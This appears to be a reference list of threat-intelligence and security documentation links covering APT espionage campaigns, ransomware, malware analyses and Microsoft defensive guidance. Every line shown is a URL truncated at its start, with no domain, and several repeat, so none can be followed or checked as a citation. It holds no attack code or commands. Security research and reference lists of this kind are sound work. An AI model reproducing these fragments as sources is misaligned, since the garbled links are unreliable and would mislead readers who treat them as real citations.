jan-since-2016-presumably-targeting-victim-files/
owerful-threat-mysterious-purpose

paign-aka-chimaera
ws-iam-console-help-you-adhere-to-iam-best-practices/
WorkingWithRDSInstanceinaVPC.html

practices_mgmt-acct.html
432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf
m/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf
eon-compromises-government-entity
m-campaigns
on-submarine-technologies
a/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50

om/global/brochure/%5BAnalysis%5DAndariel_Group.pdf
curity.com/post/2015/11/Newcomers-in-the-Derusbi-family
thms-a5b5dbdc1c6e
sample-likely-targeting-us-federal-agencies
hijacks-dod-and-windows-smart-cards
k-leads-to-gh0st-rat-variant/
om/blog/deep-thought-chinese-targeting-national-security-think-tanks/

reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/

t_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf
ty.com/research/wcefaq.html
empts-to-evade-analysis-via-custom-rop

minority-groups-public-and-private-sector-organizations
pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z
ware-family-written-in-golang
n-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies
very-using-microsoft-office-template-injection/2104

877d0/1/web/1

apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

d-in-targeted-attacks/

pes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

-possible-third-stage-that-had-keylogger-capacities
ck-basta-ransomware

e/manage-azure-subscription-policy
vernments-Attack-State-Sponsored-Malware-Attacks-Against-Activists-Lawyers-And-Journalists.pdf
018/03/07205555/TheNaikonAPT-MsnMM1.pdf
whitelisting-panacea-propaganda-33599

oup-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319
w-wi-fi-spreader/

nder-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf
ransportation-and-government-in-kuwait-and-saudi-arabia/
ers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf
rop-agent-tesla-spyware-in-advance-of-historic-opec-deal/
orensic-investigation
nder-Whitepaper-Chinese-APT.pdf
tion-and-persistence-revisited
nder-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf
nder-PR-Whitepaper-FIN8-creat5619-en-EN.pdf
nder-Whitepaper-StrongPity-APT.pdf

nder-Whitepaper-TrickBot-en-EN-interactive.pdf
nder-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf

erry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf
-something-new
espionage-outsourced

es-wake-on-lan-to-encrypt-offline-devices/
-to-leak-3tb-of-nhs-scotland-stolen-data/
ware-attacks-use-microsoft-cloudflare-themes/
nected-to-north-koreas-lazarus-group/
dde-feature-in-word-to-prevent-further-malware-attacks/
-malware-abuses-google-and-facebook-services/
s-a-new-windows-safe-mode-encryption-mode/
/ukraine-report-when-the-lights-went-out.pdf
orlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf

_gamaredon_infection.pdf
_DDoS_17-003.pdf

e_sponsored_actors_compromise_us_critical_infrastructure_3.pdf
ary-cyber-actors-target-us-and-global-critical-infrastructure.pdf

-phishing-attacks

s-Experts-ID-two-huge-cyber-gangs-in-China
ber-suite-of-malware-uses-open-source-tools/
rd-emerges-as-a-novel-and-distinct-russian-threat-actor/
-steal-aws-credentials/
-new-rat-to-watch-out-for/
tification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/
eat-analysis-the-evolution-of-lazarus/
tification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/
reat-analysis-shlayer-macos.html

ation-lockergoga-ransomware/
tification-robbinhood-ransomware-stops-181-windows-services-before-encryption/

-using-esentutl-exe/

d-implications-for-industrial-iot-security/

ed-arsenal/
o-distribute-new-modular-powershell-toolkit/
-new-normal/

ted-attacks-against-israeli-organizations/

ad-https-traffic/

e-bitcoin-blockchain/

015/03/20082004/volatile-cedar-technical-report.pdf
next-strike/
k-central-asia-with-evolving-tools/

gates-e4f03436031a

00-series-switches/white_paper_c11_603839.html
get-legacy-devices/ba-p/4169954

bilities-part-2

ment-protocol-snmp/20370-snmpsecurity-20370.html

facement.html
ting-the-tibetan-diaspora-resurfaces/

tten_2017.pdf
are-Back-in-Town-3.pdf
ampaign.pdf
dar-APT.pdf
ian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf
r-Operations-in-Lebanon-and-Oman.pdf

ilted_Tulip.pdf
Wilted_Tulip.pdf

application-lateral-movement-technique/
com/downloads/csmanual43.pdf
rocedures.pdf

rious-keylogger/
ng-resurgence-demonic-astaroth-wmic-trojan/
/nanocore-rat-resurfaced-sewers/
t-malware-bigger-threat/
ncy-ticker-app-installs-backdoors/

-group-deploying-malware-for-espionage
stry-content-trust

s/CopyKittens.pdf

c510322(v=msdn.10)
sis-fl%C3%A1vio-costa?trk=articles_directory
possession-of-log-4-shell-exploit-tools/
dhound-to-the-rescue/
nting-part-1/

ting-tactics/
iceapple-a-novel-internet-information-services-post-exploitation-framework.pdf

putter-panda.original.pdf
ucrative-targeted-ransomware/

etection-with-bring-your-own-vulnerable-driver-tactic/
r-federation/
tional-committee/
nst-wiper-malware-used-in-ukraine-attacks/
rikeGlobalThreatReport.pdf
018-global-threat-report
month-for-november-helix-kitten/
eatHuntingReport.pdf
drik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/
month-for-june-mustang-panda/
akbot-zip-based-campaign/
ng-telecom-and-bpo-companies/

hm-files-and-performing-forensic-analysis/

-to-domain-compromise
und-in-nuclear-power-plant/
jection-technique-discovered/
ringservices.com/2011/12/15/trojan-gtalk/

ng-brazil-full-research
velopment-cycles
der-the-high-road-to-enterprise-domain-control
es-e-commerce-malware-research.pdf

s%20Operation%20Cobalt%20Kitty.pdf

sis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf

nc-ransomware.pdf
-kgh-spyware-suite
he-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

-stealthy-winnti-techniques
-phosphorus-adds-new-powershell-backdoor-for-espionage

aign-against-telecommunications-providers
moses-staff-adds-new-trojan-to-ransomware-operations
nterprises-using-lolbins-and-a-new-backdoor-malware

ction-to-the-discovery-of-the-anchor-malware
LOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
-cyber-actors.pdf

ts-activities-and-techniques/
actics-and-techniques/
government-large-organizations/

/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
ources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf
ks-cut-through-latam.html
owledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066

-ransomware.html
zonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf

evilbunny-malware-instrumented-lua/
evilbunny-malware-instrumented-lua/
rop-lokibot-onto-victims-systems-6f610e44
l-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/

wide-ransomware/
ng-proxyshell

y/dns-policies-overview
state-security-charged-global-computer-intrusion

egit-login-credentials/d/d-id/1322645?

niffing-backdoor-ups-its-game

el-4-0-macro-to-drop-signed-payload
rs-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805

-lateral-movement-using-at-exe-on-windows-7-systems/
meover-ZeuS
alware-family/
izations-for-cyberespionage
d-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/
lware-analysis-attacking-korean-financial-sector/
-saved-credentials
gbackup/blob/master/netshell.html

e-directory/

crafted-government-maldocs/

operations/

curity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770
20DustySky_TLP_WHITE.pdf

tails-2015-attacks-ukrainian-news-media-electric-industry/

ing-quarian-turian/

etails-2015-attacks-ukrainian-news-media-electric-industry/
ware-advertising-platform/
ware-discovered-ukraine
white-papers-win-32-carberp.pdf
s-second-stage-backdoor/

a_ComRAT.pdf

-macos-malware-dazzlespy-asia/
eration_Ghost_Dukes.pdf

live-but-unseen.pdf

agation-campaign/
alware-updates-popular-chinese-software/
es-monlam-festival-target-tibetans/
ge-10-apt-groups/
_Dark_Side_of_the_ForSSHe.pdf

can-exe-get/
yEnergy.pdf
ping-malware-hits-ukraine
wiper-worm-targeting-ukraine
Native-Iis-Malware-wp.pdf
dustroyer.pdf
re-undercover/

at-high-performance-computing-infrastructure/

eration_Interception.pdf
rican-casino/
tNeuron.pdf

vst-software/

epanov-VB2018-Octopus.pdf

th-oceanlotus-decoys/

um_and_Ketrican.pdf
Groundbait.pdf
malware-attacks-colombia/
e-tech-companies-plead-malware-campaign/

-Manual.pdf
g-The-Snake-Nest.pdf
counted-unhappy-meal/

t-part-2.pdf

cking-air-gapped-networks/
at_report_t32021.pdf
ing-industroyer-notpetya/
uptive-killdisk-attacks/
g-backdoor/
attacks-against-ukraine/
ation-disrupt-trickbot/
r-landing-diplomatic-missions/
a_Mosquito.pdf
s-generic-tools/

ection-of-a-large-linux-server-side-credential-stealing-malware-campaign/
zero-day-vulnerability-roundcube-webmail-servers/

s-TrickBoot-Persist-Brick-Profit.pdf

hniques-technical-survey-common-and-trending-process
-security-warning-after-updating-my-electron-project-t
intentionally-giving-malicious-code-room-to-run-e2e1447d01b8
angelog-did-operation-lotus-blossom-cause-it-to-evolve/
s-trickbot-to-steal-data-spread-ryuk-ransomware#:~:text=TrickBot%20uses%20a%20hidden%20VNC,desktop%20without%20the%20victim
licy-csp-windowslogon
e-execution-d7226864caee
cryptocurrency-mining-and-ransomware-campaign
lkit-airgapped-networks/

/BlackEnergy_Quedagh.pdf

threat-intel-report2.pdf
etasploit-code/

b-devices-to-install-ransomware/
of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
eport_tlp-white.pdf

cnation_FINAL_0.pdf

6/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf

/FinFisher/index.html
a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

s_grou.html
apanese-corporations-using-updated-ttps.html
m/rs/fireye/images/APT17_Report.pdf
equest-of-counsel.html
/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
spitality-sector.html

ncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

chinese-government-in-covid-19-related-espionage.html
-apt32.html
ning-a-potentially-destructive-adversary.html
to-iranian-cyber-espionage.html

n-middle-east-by-apt34.html
ng-apt34-invite-to-join-their-professional-network.html
-attack-in-the-middle-east

eb_v5-1.pdf
ber-espionage-group-focused-on-personal-information.html
-a-china-nexus-espionage-actor.html

obal-intrusion-campaign-using-multiple-exploits.html
e-1498163766.pdf
t-record.html
anak-backdoor.html
ploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html
part-deux.html
estine-wolf-adobe-flash-zero-day.html
hreats/pdfs/rpt-dll-sideloading.pdf
/blog/threat-research/2015/12/the-eps-awakens-part-two.html
nse-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html
vulnerabilities-used-to-distribute-felixroot-backdoor.html

ting-a-fin6-intrusion.html

-enigmatic-and-evasive-global-criminal-operation.html
blog/threat-research/2017/03/fin7_spear_phishing.html
ponding-to-new-tools-and-techniques.html
ases-persistence.html
ay-payment-cards.html
t-and-fivehands-ransomware-sophisticated-financial-threat.html
entral-asia-targeted-with-hawkball-backdoor.html
anced-persistent-attack-techniques-part-2.html

anced-persistent-attack-techniques-part-1.html
emalt-with-a-ransomware-chaser.html

o-is-reading-your-text-messages.html
es-procedures-associated-with-maze-ransomware-incidents.html
paign-targeting-brazilian-users.html
oup-updates-ttps-in-spear-phishing-campaign.html
ampaigns-usage-process-hollowing
/blog/threat-research/2017/06/obfuscation-in-the-wild.html

ats-middle-east-cyber-attacks-using-poison-ivy.html
ron-rose.pdf
es-tough-outlook-for-home-page-attacks.html
800am-500pm-work-day-fireeye-confirms-dojs-findings-on-apt1-intrusion-activity.html

se-espionage-group-targeting-maritime-and-engineering-industries.html

inst-machine-learning-to-disrupt-industrial-production.html

m-credential-theft-malware-to-business-disruption.html
-supply-chain-software-compromise.html
nal-technical-details.html
leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
d-stage-backdoor-targeting-us-based-entity.html

n-darkside-ransomware-operations.html
/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf
n-russian-government-owned-lab-most-likely-built-tools.html
eatise-on-TRITON-and-tristation.html
profile-custom-attack-tools-detections.html
-new-ics-attack-framework-triton.html

alicious-tls-callback-technique.html
hreats/pdfs/wp-windows-management-instrumentation.pdf
are-profile.html
nd-sqlrat-malware/

alware-command-and-control
-felismus-malware
-security-labs-monsoon-analysis-report.pdf
sla-spyware-variant.html
malware-javaupdtr.html
used-by-wizard-spider
otet-variant-part-1.html
nt-targeting-customers-of-financial-institutions
wild-2.html
sance-plugin.html

sofacys-linux-backdoor/
okibi-spam-cinarat-and-fake-g-data

ng-group-hacked-100-websites-to-use-as-watering-holes/

trat-variant
adhatch-and-a-detailed-look-at-fin8s-tooling/

Group%20Policy%20Templates/en-US/SecGuide.adml
core/teamserver/modules/boo

142266564845297/client/command/filesystem/download.go

3aa8d330baad22/client/command/network/ifconfig.go
453b510c3a73b/implant/sliver/netstat
creenshot_windows.go
3aa8d330baad22/client/command/filesystem/upload.go

riv/server/elevate

overnments

ine-threats/

shing-malware/
ty-researchers/

-oauth-scopes

oiting-winrar-vulnerability/
n.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf
ovider-dlls.html

5Mzc5MS4xNjk4OTI5NzY4*_ga_QMES53K3Y2*MTcwNDcyMjU2OS40LjEuMTcwNDcyMzU1Mi41My4wLjA.
h-windows-script-files/

s-producing-cyber-attacks.html
asids-oh-my/

seeking-affiliates-to-in-the-wild-in-2-days/
how-file-extensions/

ords-to-adversaries-with-nppspy
g-banks-in-spain/

at-group-operations/
-ibm-x-force-research/
omparison-of-top-megacortex-modifications/
ew-techniques-affecting-organizations-worldwide/
s-with-sdbbot-rat/
ckbots-machinations/
targets-energy-sector-in-the-middle-east/

el-modules-loading/

butes-file-system-attacks
ant-found-using-a-dirty-new-trick/
e-comes-out-of-its-shell/
ransomware-affiliate-operation/
e-papers/security-technologies-4th-gen-core-retail-paper.pdf
ain-attack-through-ccleaner/
-infecting-docker-servers-in-the-cloud/

e-cloud-monitoring-tools-to-conduct-cyber-attacks/

an-xtunnel/
com/new-signed-malware-called-janicab/

g_off_the_Land.PDF
uration/understanding-and-using-dai.html
igns-used-to-install-new-icedid-banking-malware
wnload.do?attach_file_seq=2695&attach_file_id=EpF2695.pdf

018/03/07195002/KL_AdwindPublicReport_2016.pdf
mware/102811/

018/03/08064518/Carbanak_APT_eng.pdf

018/03/08070903/darkhotel_kl_07.11.pdf

s/2015/06/The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf

018/03/08064459/Equation_group_questions_and_answers.pdf
an/102806/

018/03/20134940/kaspersky-lab-gauss.pdf

018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
018/03/07190154/The-ProjectSauron-APT_research_KL.pdf

ler-part1-final.pdf
izing-in-global-cyber-espionage/73673/

nalysis_KL.pdf

018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf
017/08/07172148/ShadowPad_technical_description_PDF.pdf
oolset/72924/
018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

018/03/08080105/KL_Epic_Turla_Technical_Appendix_20140806.pdf

and-since-at-least-2019/105044

alware-adds-ransomware-component/
ky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor
ge=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=
xfiltrating-emails-thread-hijacking-attacks
rawpos-malware

RNETES_HARDENING_GUIDANCE_1.2_20220829.PDF

ce-account/

-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
aign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/
he-china-chopper-web-shell-part-i.html
-cyber-focus-in-2023/
nical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf
srr_20180118_us_v.1.0.pdf
plomat-linked-to-operation-lotus-blossom/
-lotus-blossom.html
et-investigation/
y-exploitation/
adds-linux-targeting.html
ert/sites/default/files/publications/MAR-10135536-B_WHITE.PDF
tes/default/files/publications/MAR-10135536-F.pdf
file-Reference.pdf

allowing-device-access-due-to-overload-of-push-notifications

ty-in-group-policy-preferences-could-allow-elevati
7/ms17-010

-actor-targeting-organizations-for-data-exfiltration-and-destruction/
d-nobelium-malware-leads-to-persistent-backdoor/
r-sibot-analyzing-nobelium-malware/
-email-based-attack-from-nobelium/
g-delegated-administrative-privileges-to-facilitate-broader-attacks/
beliums-latest-early-stage-toolset/
st-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/

ms-post-compromise-trick-to-authenticate-as-anyone/
curity-with-the-new-microsoft-vulnerable-and-malicious-driver-reporting-center/
sites/default/files/publications/MAR-10135536-G.PDF
onceals-malicious-code-within-bmp-file-to-drop-its-rat/

credit-card-skimmer-with-fake-content-delivery-network-ngrok-server/
cting-lures-to-victims-payloads-to-infrastructure
-rat-a-new-feature-rich-malware-spotted-in-the-wild
g-truly.html
variant-steals-wifi-credentials/
cker-enters-the-ransomware-scene-asks-for-partners
ariant-installs-configuration-profiles-on-macs/
t-1-darkcomet/

er-isaacwiper-and-caddywiper/
s-into-stealthier-rat/
tinues-to-target-south-korean-government-using-appleseed-backdoor/
of-konni-malware-used-in-campaign-targetting-russia/
ony-from-a-mail-to-a-trojan-horse/
37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/
into-saint-bot-downloader/
ian-apt-phishing-attack/
ownloader-with-a-smokescreen-still-alive/
e/2017/03/new-targeted-attack-saudi-arabia-government/

iant-apt1-report.pdf

ve-directory-backdoors

exploitation
on-persistence
trategies-for-microsoft-365-to-defend-against-unc2452

s/rpt-mtrends-2016.pdf

cks-against-ministries-of-foreign-affairs
promising-pulse-secure-vpn-devices
e-bypass-techniques-pulse-secure-zero-day
eat-actor-conducts-politically-motivated-disruptive-activity-against/
ening-strategies-for-m365-defend-against-apt29-white-paper.pdf

eting-israeli-shipping
kraine-operational-technology
o-evade-sanctions/
dopts-dde-technique-nyc-attack-theme-in-latest-campaign/

omware.pdf
-turkish-financial-sector-new-bankshot-implant/
ghostsecret-attack-seeks-to-steal-data-worldwide/
dens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/
rs-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/
h-star-a-job-offer-thats-too-good-to-be-true/?hilite=%27Operation%27%2C%27North%27%2C%27Star%27
h-star-behind-the-scenes/
es-targets-global-banks-bitcoin-users/

ecent-targeted-attacks/
%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf
ceansalt.pdf
yzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/
y-exploit-targeting-microsoft-office-2
ns-to-wipe-systems-in-middle-east-europe/
kers-employ-new-tool-kit-to-wipe-infected-systems/
harpshooter.pdf
yzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/
tion-ghostsecret-attack-seeks-to-steal-data-worldwide/

he-bee-and-the-trickbot-connection-686379311056
oss-platform-d807ba13ca30

est-version-of-guloader-75083fb15cb4

malware-hides-by-abusing-avast-executable-ac9b8b392767
te-targeting-ukraine-9d5d158f19f3

nt-nation-state-cyber-attacks/
device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa
5-defender-to-coordinate-protection-against-solorigate/

10-to-offer-application-developers-new-malware-defenses/?source=mmpc
r-exploit-guard/enable-attack-surface-reduction
ttack-surface-reduction-rules-reference#block-execution-of-potentially-obfuscated-scripts

krainian-organizations/
vestigates-iranian-attacks-against-the-albanian-government/

e-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
rity/anti-spoofing-protection?view=o365-worldwide
510322(v=msdn.10)?redirectedfrom=MSDN
ure-identity#block-end-user-consent

ad-security-baseline
-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/

ves-of-blackcat-ransomware/
enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1

ess/concept-conditional-access-policy-common

ngs/create-a-token-object
/nf-processthreadsapi-createprocessa
credential-guard-how-it-works

ng-dubnium-stage-2-payload-analysis/
ng-dubnium-2/
e-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
wer-apps-and-power-automate-with-azure-ad-conditional-access-policies/

-12b036fd-d140-4e74-b45e-16fed1a7e5c6

office-developer/turn-off-visual-basic-for-application
monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/
ndows-defender-application-control/microsoft-recommended-driver-block-rules
ry-search-order?redirectedfrom=MSDN
ry-security?redirectedfrom=MSDN

credential-guard-manage
ws-commands/expand
ws-commands/ftp
oint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus
xposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/
global-telecom/

olicy/filtering-the-scope-of-a-gpo
xrule?view=exchange-ps
escription?Name=HackTool:Win32/Gsecdump
-exchange-servers/
hreat-protection-mapping-attack-chains-from-cloud-to-endpoint/
urity/isapicgirestriction/

e-investigation-final-update/
nds-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021
x?Name=Win32%2FKasidet

gure-the-clickonce-trust-prompt-behavior?view=vs-2022&tabs=csharp
d-authenticode?view=vs-2022
r-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

il-flow-rules/manage-mail-flow-rules
sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
e-dll-preloading-remote-attack-vector/
overnment-organizations-across-latin-america-and-europe

dows-server-2012-r2-and-2012/cc754051(v=ws.11)
dows-server-2012-r2-and-2012/cc725622(v=ws.11)

ows-server-2012-R2-and-2012/jj852185(v=ws.11)?redirectedfrom=MSDN
g-delegated-administrative-privileges-to-facilitate-broader-attacks
A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20Apri
continues-to-evolve-find-ways-to-maintain-invisibility/?source=mmpc
m-activity-and-infrastructure-targeting-israeli-organizations/
rview?view=powershell-7.3
ect-customers-from-hacking/
escription?Name=Backdoor%3aWin32%2fPoisonivy.E

ows-2000-server/cc961961(v=technet.10)?redirectedfrom=MSDN
e-ransomware-impacts-organizations-in-ukraine-and-poland/
c-from-lateral-connections
t-primary-refresh-token
=vs.85).aspx
otection-and-management/protected-users-security-group
7-e6b9-4495-8e43-2bbcdbcb6653

e-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/
obin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

-local-accounts-laps-changes-everything/
ngs/replace-a-process-level-token
-directory-changes-permission-for-the-micr
tity-management/azure-ad-pim-approval-workflow
56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf
7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf
tions-manager-2005/cc180803(v=technet.10)

ng-new-patters-credential-harvesting/
eged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach
ad-security-baseline
nt-nation-state-cyber-attacks/
eaborgiums-ongoing-phishing-operations/
mmands/sxstrace
ws-system-services-fundamentals.aspx
=vs.85).aspx
estsigning-boot-configuration-option
ections-trump-biden/

d-office-365-mail-forwarding-2/
ept-token-protection
escription?Name=Trojan:Win32/Totbrick

ttack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
ows-server-2012-R2-and-2012/ee791851(v=ws.11)?redirectedfrom=MSDN
n-targets-us-critical-infrastructure-with-living-off-the-land-techniques/
rvice/windows-time-service-tools-and-settings
-defender-application-control/microsoft-recommended-block-rules
visory-update-to-improve-credentials-protection-a
ers-in-group-policy/
re-targeting-ukrainian-organizations/
escription?Name=Backdoor:Win32/Truvasys.A!dha
ndows-defender-application-control/windows-defender-application-control
escription?Name=Backdoor:Win32/Wingbird.A!dha
actors-in-recent-german-industrial-attacks-with-windows-defender-atp/
ndows-defender-application-control/microsoft-recommended-driver-block-rules

ndows-defender-application-control/microsoft-recommended-block-rules

dows-fax-service/
ttest-new-york-times-attackers-evolve-quickly.html
-apt-group-2.html

spionage-against-foreign-diplomats-in-belarus/
ntial-muddywater-campaign-uses-powershell-based-prb-backdoor/
analysis-of-royalcli-and-royaldns/

.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/
nds-ransomware-variant/
tics-and-procedures/

-team9-malware-family/
ware-variant-developed-by-the-evil-corp-group/

development-V1-1.pdf
ware-cyclops-blink-replaces-vpnfilter

i/6/mivd-aivd-advisory-coathanger-tlp-clear/TLP-CLEAR+MIVD+AIVD+Advisory+COATHANGER.pdf

e-abuses-nkn-blockchain-for-stealthy-comms/#google_vignette

CITRIXADC-V1.PDF
-whitelisting-using-microsoft-applocker.cfm
Turla_20191021%20ver%204%20-%20nsa.gov.pdf
ndworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf
h-windows-event-log-monitoring.cfm
-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
ORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
-used-by-blacktech
ew-malicious-tool/
-a-gh0st-rat-variant/
-need-is-one-a-clickonce-love-story/

vering-cobalt-strike-and-qakbot
/15-ways-to-bypass-the-powershell-execution-policy/
uxnet-Update-Feb-2011.pdf

ockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
ster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
on-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf
ockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf
ster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf
wp-content/uploads/2015/04/novetta_winntianalysis.pdf
wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
e-routers-to-disguise-attacks
ionage-orb-networks
hungry-credentials/

oint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-execution-of-potentially-obfuscated-scripts

ners?view=o365-worldwide
ismdoor-variant-possibly-linked-greenbug-threat-group/
p-steps-attacks-new-delivery-documents-new-injector-trojan/

ta-adds-support-for-dpop/
hreats/pdfs/wp-operation-quantum-entanglement.pdf
natch-eng.pdf
017-eng.pdf
ovid-19-and-new-year-greetings-the-higaisa-group/
ber-security/pdf/cloud-hopper-report-final-v4.pdf
er-technical-annex-april-2017.pdf
sues/cyber-security-services/research/the-keyboys-are-back-in-town.html
analysis-command-control.html
p-after-wellmess.html
ce/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html
-alert-reference/cortex-xdr-analytics-alert-reference/uncommon-arp-cache-listing-via-arp-exe.html

n-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
ntinues-target-organizations-east-asia/
-attacks-use-dns-requests-as-command-and-control-mechanism/
redon-group-toolset-evolution/
in/2024-06-25-IOCs-from-Latrodectus-activity.txt
t-new-moonwind-rat-used-attack-thai-utility-organizations/
eting-russian-organizations-linked-to-roaming-tiger/

walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/
-provide-glimpse-development-testing-efforts/
n-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
are-campaign-updates-toolset-and-expands-targets/
ater-target-middle-eastern-government/

are-with-ties-to-sunorcal-discovered/
ojan-targets-sweden-switzerland-and-japan/
r-targets-indian-ambassador-to-afghanistan/
return-disttrack-wiper/
ups-parallel-attacks/
odular-backdoor-uses-complex-anti-analysis-techniques/

eturns-new-malware-new-attacks-japanese-academics-organizations/
t-active-two-years/
y-attacks-use-dns-requests-as-command-and-control-mechanism/
nd-an-increase-in-tax-themed-phishing-e-mails/
-continues-deliver-badnews-indian-subcontinent/
avigates-east-asia/

oft-exchange/
ranian-mabna-institute-indictment
d-a-new-wave-of-emotet-is-back-to-wreak-havoc.html
ntial-dumping-technique-and-its-adversary-use
-analysis-of-sodinokibi-ransomware

om/darkwatchman-new-fileless-techniques/

content/blog/carberp-a_modular_information_stealing_trojan.pdf
orts.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf
gcontent-ms-within-pdf-files-distribute-flawedammyy-rat
bot-adds-tor-functionality
stealer-improves-loading-features-spreads-alongside

der-integrates-cve-2017-0199-utilized-cobalt-group-target
actor-spearphishes-maritime-and-defense-targets
rgets-united-states-utilities-sector-phishing-attacks

nsparent-tribe-threat-insight-en.pdf
novel-rtf-template-inject-technique-poised-widespread

a407-silent-librarian
ug-ta416-increases-operational-tempo-against-european
nd-returns-golang-plugx-malware-loader
marc-abuse-ta427s-art-information-gathering
uses-embedded-links-pdf-attachments-latest-campaign
holars-conversation-ta453
ets-us-and-israeli-medical-research-personnel-credential
dgrace-new-malware-introduced-ta505

n-source-code-turned-malware
w-sdbbot-remote-access-trojan-get2-downloader
a505-dridex-globeimposter
t-served-cold-winter-vivern-uses-known-zimbra-vulnerability
elarus-zerot-plugx
rotect-m365-from-on-premises-attacks

articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/
nian-targets-hit-by-hermeticwiper-new-datawiper-malware
